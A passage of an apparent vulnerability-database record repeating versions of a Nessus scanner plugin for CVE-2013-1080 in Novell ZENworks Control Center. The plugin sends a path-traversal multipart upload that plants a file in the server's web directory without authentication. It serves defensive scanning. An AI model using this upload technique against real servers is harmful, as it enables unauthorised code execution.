script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["description"], "edition": 7, "lastseen": "2018-11-17T03:15:20"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 0.0, "vector": "NONE"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with authentication checking on '/zenworks/jsp/index.jsp' that can allow a remote, unauthenticated attacker to upload arbitrary files and execute them with SYSTEM privileges. Nessus has exploited this vulnerability to upload a file to the '/zenworks/css' directory.", "edition": 5, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "2ede696d4e75976ffbbb3868703c353aa33436b0a911b1f0c1422f16aa3ff1e9", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "bd6d9651d6caedb9ea72ad4be4f2a1ef", "key": "references"}, {"hash": "cfeae2a362e44886f54cb768b1bf6a66", "key": "sourceData"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "04945d09bd1c4ab9a7408d7cd4659431", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2018-08-30T19:56:52", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": ["http://www.zerodayinitiative.com/advisories/ZDI-13-049/", "http://www.novell.com/support/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.novell.com/support/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["cvss"], "edition": 5, "lastseen": "2018-08-30T19:56:52"}, {"bulletin": {"bulletinFamily": "scanner", "cpe": ["cpe:/a:novell:zenworks_configuration_management"], "cvelist": ["CVE-2013-1080"], "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "description": "The installed version of Novell ZENworks Control Center has a flaw with authentication checking on '/zenworks/jsp/index.jsp' that can allow a remote, unauthenticated attacker to upload arbitrary files and execute them with SYSTEM privileges. Nessus has exploited this vulnerability to upload a file to the '/zenworks/css' directory.", "edition": 6, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}}, "hash": "966221f0f1690f7f8024b4af0452e7ad114615e21a819051b5422670f0b7bebf", "hashmap": [{"hash": "95a0a2a2e39f7412af46fcac0cebe0bf", "key": "cvelist"}, {"hash": "98da6d012ea545a1e6678fc9f410f0cd", "key": "published"}, {"hash": "e6d6950356cc053768dc31379220b136", "key": "pluginID"}, {"hash": "9cf00d658b687f030ebe173a0528c567", "key": "reporter"}, {"hash": "1758aa7ce8ec03c7d8f476d27f7fc18f", "key": "title"}, {"hash": "bd6d9651d6caedb9ea72ad4be4f2a1ef", "key": "references"}, {"hash": "cfeae2a362e44886f54cb768b1bf6a66", "key": "sourceData"}, {"hash": "5299677d29a0b2004584ce465e834b3e", "key": "modified"}, {"hash": "2bdabeb49c44761f9565717ab0e38165", "key": "cvss"}, {"hash": "b054a9b5b61ea3f1b7b1945d2f188b19", "key": "href"}, {"hash": "bbdaea376f500d25f6b0c1050311dd07", "key": "bulletinFamily"}, {"hash": "5e0bd03bec244039678f2b955a2595aa", "key": "type"}, {"hash": "04945d09bd1c4ab9a7408d7cd4659431", "key": "description"}, {"hash": "07948b8ff59e8dda0b01012f70f00327", "key": "naslFamily"}, {"hash": "068b77d157186fca8172f86db425ec10", "key": "cpe"}], "history": [], "href": "https://www.tenable.com/plugins/index.php?view=single&id=66914", "id": "NOVELL_ZENWORKS_CONTROL_CENTER_RCE_REMOTE.NASL", "lastseen": "2018-09-02T00:08:19", "modified": "2018-06-13T00:00:00", "naslFamily": "CGI abuses", "objectVersion": "1.3", "pluginID": "66914", "published": "2013-06-18T00:00:00", "references": ["http://www.zerodayinitiative.com/advisories/ZDI-13-049/", "http://www.novell.com/support/kb/doc.php?id=7011812"], "reporter": "Tenable", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2018/06/13 18:56:28\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"http://www.novell.com/support/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! isnull(hn))\n host = hn;\n else\n {\n host = get_preference('sc.hostname.' + get_host_ip());\n if (strlen(host) == 0) host = get_host_name();\n }\n\n if( isnull(host)) exit(1, 'Error getting host name.');\n\n rq = make_array();\n rq['$data'] = postdata;\n rq['$method'] = 'POST';\n\n rq['$uri'] = '/zenworks/jsp/index.jsp?pageid=newDocumentWizard';\n rq['$port'] = port;\n rq['$request'] = 'POST /zenworks/jsp/index.jsp?pageid=newDocumentWizard HTTP/1.1';\n\n rq['Content-Length'] = strlen(postdata);\n rq['Host'] = host;\n rq['Content-Type'] = 'multipart/form-data; boundary=' + boundary;\n\n # nb: the server requires the data to be sent in this exact manner,\n # or the exploit won't work. I couldn't get this to work using\n # http_send_recv3() because it calls http_mk_req() which adds extra\n # headers that cause the exploit to fail\n w = http_send_recv_req(port: port, req: rq,\n exit_on_fail: TRUE);\n\n if (\"302\" >!< w[0]) continue;\n\n exploit_req = http_last_sent_request();\n\n res = http_send_recv3(method:\"GET\",\n item:\"/zenworks/css/\" + fname,\n port:port,\n exit_on_fail:TRUE);\n if (res[2] == msg)\n {\n vuln = TRUE;\n break;\n }\n}\n\nif (vuln)\n{\n if(report_verbosity > 0)\n {\n report =\n '\\n Nessus was able to upload a file to the server with the following' +\n '\\n request :\\n\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n' +\n chomp(exploit_req) + '\\n' +\n crap(data:\"-\", length:30)+' snip '+ crap(data:\"-\", length:30) + '\\n\\n' +\n '\\n It can be accessed here: ' + build_url(port:port, qs:'/zenworks/css/' + fname) + '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse\n audit(AUDIT_WEB_APP_NOT_AFFECTED, \"Novell ZENworks Control Center\", build_url(port:port, qs:'/'));\n", "title": "Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)", "type": "nessus", "viewCount": 2}, "differentElements": ["references", "modified", "sourceData"], "edition": 6, "lastseen": "2018-09-02T00:08:19"}], "edition": 11, "hashmap": [{"key": "bulletinFamily", "hash": "bbdaea376f500d25f6b0c1050311dd07"}, {"key": "cpe", "hash": "068b77d157186fca8172f86db425ec10"}, {"key": "cvelist", "hash": "95a0a2a2e39f7412af46fcac0cebe0bf"}, {"key": "cvss", "hash": "edfca85c4c320ffaa9dcfdcb6a20ce1d"}, {"key": "description", "hash": "e2b2244f868feb1714d67ab299c5131c"}, {"key": "href", "hash": "6a95d4214f12750e340ba0b31813bc2f"}, {"key": "modified", "hash": "abcf9266f425f12dda38f529cd4a94bc"}, {"key": "naslFamily", "hash": "07948b8ff59e8dda0b01012f70f00327"}, {"key": "pluginID", "hash": "e6d6950356cc053768dc31379220b136"}, {"key": "published", "hash": "98da6d012ea545a1e6678fc9f410f0cd"}, {"key": "references", "hash": "5be30e03e787d644feaf8f202e413723"}, {"key": "reporter", "hash": "528cea5b87bf77107bd9f05291bbffe5"}, {"key": "sourceData", "hash": "de435e0277c005ba6f706cbc59d9eef7"}, {"key": "title", "hash": "1758aa7ce8ec03c7d8f476d27f7fc18f"}, {"key": "type", "hash": "5e0bd03bec244039678f2b955a2595aa"}], "hash": "c860ee60ff80f4193637b8b3245a244ddeccba1997fc19bc5e61b10eb5e911cd", "viewCount": 6, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2013-1080"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121042"]}, {"type": "saint", "idList": ["SAINT:94F8E6CAEFFA04E9B0850B791E66098C", "SAINT:C3531EE26357FAABF8C0AF2404E0F11F", "SAINT:85C63EDF8538DBC326B3583D7C8AC0EA"]}, {"type": "d2", "idList": ["D2SEC_ZCM2"]}, {"type": "zdi", "idList": ["ZDI-13-049"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/MULTI/HTTP/ZENWORKS_CONTROL_CENTER_UPLOAD"]}, {"type": "nessus", "idList": ["NOVELL_ZCC_RCE.NASL"]}, {"type": "exploitdb", "idList": ["EDB-ID:24938"]}, {"type": "dsquare", "idList": ["E-318"]}, {"type": "zdt", "idList": ["1337DAY-ID-20599"]}], "modified": "2019-11-01T03:00:24"}, "score": {"value": 8.3, "vector": "NONE", "modified": "2019-11-01T03:00:24"}, "vulnersScore": 8.3}, "objectVersion": "1.3", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66914);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2018/11/15 20:50:18\");\n\n script_cve_id(\"CVE-2013-1080\");\n script_bugtraq_id(58668);\n\n script_name(english:\"Novell ZENworks Control Center File Upload Remote Code Execution (intrusive check)\");\n script_summary(english:\"Tries to upload file\");\n\n script_set_attribute(attribute:\"synopsis\", value:\"The remote host is affected by a remote code execution vulnerability.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Novell ZENworks Control Center has a flaw with\nauthentication checking on '/zenworks/jsp/index.jsp' that can allow a\nremote, unauthenticated attacker to upload arbitrary files and execute\nthem with SYSTEM privileges. Nessus has exploited this vulnerability to\nupload a file to the '/zenworks/css' directory.\"\n );\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microfocus.com/kb/doc.php?id=7011812\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-13-049/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to ZENworks 11.2.2 and apply the interim fix, or apply 11.2.3a\nMonthly Update 1 for 11.2.3 installs.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"Novell ZENworks Configuration Management 11 SP2 File Upload\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Novell ZENworks Configuration Management Remote Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'D2ExploitPack');\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/03/22\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/03/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:novell:zenworks_configuration_management\");\n script_set_attribute(attribute:\"exploited_by_nessus\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_DESTRUCTIVE_ATTACK);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"os_fingerprint.nasl\", \"novell_zenworks_control_center_detect.nasl\");\n script_require_ports(\"Services/www\", 443);\n script_require_keys(\"www/zenworks_control_center\");\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\ninclude(\"url_func.inc\");\n\nport = get_http_port(default:443);\n\ninstall = get_install_from_kb(\n appname : \"zenworks_control_center\",\n port : port,\n exit_on_fail : TRUE\n);\n\nboundary = '----------Nessus';\n\n# Determine what to look for.\nos = get_kb_item(\"Host/OS\");\nif (os && report_paranoia < 2)\n{\n if (\"Windows\" >< os) traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\');\n else traversals = make_list('..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\nelse\n{\n traversals = make_list('..\\\\webapps\\\\zenworks\\\\css\\\\',\n '..\\\\..\\\\opt\\\\novell\\\\zenworks\\\\share\\\\tomcat\\\\webapps\\\\css\\\\',\n '../../opt/novell/zenworks/share/tomcat/webapps/css/');\n}\n\nfname = rand_str(length:8) + '_nessus.txt';\nmsg = 'file created by nessus : ' + SCRIPT_NAME;\n\nvuln = FALSE;\nforeach traversal (traversals)\n{\n postdata =\n '--' + boundary + '\\r\\n' +\n 'Content-Disposition: form-data; name=\"mainPage:_ctrl21a:FindFile:filePathTextBox\"; '+\n 'filename=\"' + traversal + fname + '\"' + '\\r\\n' +\n 'Content-Type: text/plain\\r\\n' +\n '\\r\\n' +\n msg +\n '\\r\\n' +\n '--' + boundary + '--' + '\\r\\n';\n\n host = NULL;\n hn = get_kb_item('www/'+port+'/http11_hostname');\n if (! 